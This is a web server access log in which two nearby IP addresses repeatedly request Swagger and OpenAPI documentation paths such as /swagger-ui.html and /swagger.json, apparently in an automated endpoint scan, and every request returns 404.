34.19.127.190 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-resources/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-ui/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:29 +0000] "GET /swagger-ui.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:30 +0000] "GET /swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:30 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:30 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:30 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:30 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:30 +0000] "GET /swagger-ui/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:31 +0000] "GET /swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:32 +0000] "GET /swagger/index.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:33 +0000] "GET /swagger/index.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:33 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:33 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:33 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:33 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:33 +0000] "GET /swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:34 +0000] "GET /swagger/swagger-ui.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:34 +0000] "GET /swagger/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:34 +0000] "GET /swagger/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:34 +0000] "GET /swagger/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:35 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:35 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:35 +0000] "GET /swagger/index.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:35 +0000] "GET /swagger/ui/index HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:36 +0000] "GET /swagger/ui/index HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:36 +0000] "GET /swagger/ui/index HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
